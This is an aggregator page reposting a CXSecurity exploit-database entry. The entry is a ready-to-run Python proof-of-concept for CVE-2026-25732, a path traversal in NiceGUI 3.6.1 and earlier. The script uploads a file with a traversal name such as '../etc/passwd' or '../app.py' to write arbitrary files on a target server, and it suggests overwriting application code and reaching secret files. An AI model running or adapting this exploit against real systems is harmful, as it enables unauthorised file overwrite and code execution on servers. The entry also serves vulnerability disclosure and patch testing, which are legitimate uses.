惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
Spread Privacy
Spread Privacy
T
The Exploit Database - CXSecurity.com
Simon Willison's Weblog
Simon Willison's Weblog
P
Privacy & Cybersecurity Law Blog
L
LINUX DO - 热门话题
T
Threat Research - Cisco Blogs
T
Tenable Blog
TaoSecurity Blog
TaoSecurity Blog
Security Archives - TechRepublic
Security Archives - TechRepublic
AI
AI
P
Proofpoint News Feed
A
About on SuperTechFans
P
Privacy International News Feed
月光博客
月光博客
雷峰网
雷峰网
S
Secure Thoughts
博客园 - 叶小钗
博客园 - 聂微东
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Project Zero
Project Zero
The Cloudflare Blog
SecWiki News
SecWiki News
The Hacker News
The Hacker News
V
Vulnerabilities – Threatpost
罗磊的独立博客
A
Arctic Wolf
阮一峰的网络日志
阮一峰的网络日志
Know Your Adversary
Know Your Adversary
酷 壳 – CoolShell
酷 壳 – CoolShell
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
T
Troy Hunt's Blog
The Last Watchdog
The Last Watchdog
Schneier on Security
Schneier on Security
小众软件
小众软件
有赞技术团队
有赞技术团队
博客园 - 司徒正美
T
Tailwind CSS Blog
量子位
C
Cybersecurity and Infrastructure Security Agency CISA
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Hugging Face - Blog
Hugging Face - Blog
人人都是产品经理
人人都是产品经理
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
S
Security @ Cisco Blogs
大猫的无限游戏
大猫的无限游戏
S
SegmentFault 最新的问题
Apple Machine Learning Research
Apple Machine Learning Research
宝玉的分享
宝玉的分享
L
Lohrmann on Cybersecurity

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
NiceGUI 3.6.1 Path Traversal - CXSecurity.com
Mohammed Idr · 2026-05-20 · via The Exploit Database - CXSecurity.com

NiceGUI 3.6.1 Path Traversal

# Exploit Title: NiceGUI 3.6.1 - Path Traversal # Author: Mohammed Idrees Banyamer # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Date: 2025-06-06 # Tested on: NiceGUI <= 3.6.1 (Python 3.8–3.12 on Linux/Windows) # CVE: CVE-2026-25732 # # Affected Versions: <= 3.6.1 (fixed in 3.7.0) # # Type: Remote Arbitrary File Write / Path Traversal # Platform: Web Application (Python / NiceGUI) # Author Country: Jordan # Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) # Attack Vector: Network # Privileges Required: None #!/usr/bin/env python3 """ CVE-2026-25732 — NiceGUI arbitrary file write (path traversal) Exploits unsanitized FileUpload.name when app uses it in save path. Usage: python exploit_cve_2026_25732.py http://target:8080 "../etc/passwd" payload.txt python exploit_cve_2026_25732.py http://target:8080 "../app.py" malicious_app.py """ import sys import requests from urllib.parse import urljoin from pathlib import Path def exploit(target_url: str, malicious_filename: str, local_payload_path: str | Path): target_url = target_url.rstrip('/') + '/' try: with open(local_payload_path, 'rb') as f: payload_bytes = f.read() except Exception as e: print(f"[-] Cannot read payload file: {e}") sys.exit(1) files = { 'file': (malicious_filename, payload_bytes, 'application/octet-stream') } print(f"[*] Target : {target_url}") print(f"[*] Malicious name : {malicious_filename}") print(f"[*] Payload size : {len(payload_bytes):,} bytes") try: # NiceGUI upload endpoint is usually the page itself (multipart POST to /) r = requests.post( target_url, files=files, timeout=12, allow_redirects=False ) print(f"[+] Response : {r.status_code} {r.reason}") if r.status_code in (200, 201, 204): print("[SUCCESS] Upload accepted — file likely written") elif r.status_code == 413: print("[!] Payload too large (server limit)") elif r.status_code in (400, 403, 422): print("[!] Rejected — target may be patched / not vulnerable / wrong endpoint") else: print("[?] Unexpected response — check manually") print("\nSnippet of response:") print(r.text[:600].replace('\n', ' ').strip() + "..." if len(r.text) > 600 else r.text) except requests.RequestException as e: print(f"[-] Request failed: {e}") print("\nNext steps:") print(" • Check filesystem on target (if you have access)") print(" • If you overwrote app.py / main.py → wait for reload / restart") print(" • Try deeper traversal: '../../some/secret/file' etc.") if __name__ == '__main__': if len(sys.argv) != 4: print(__doc__) sys.exit(1) target = sys.argv[1] dest_filename = sys.argv[2] payload_file = sys.argv[3] exploit(target, dest_filename, payload_file)



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2026, cxsecurity.com

Back to Top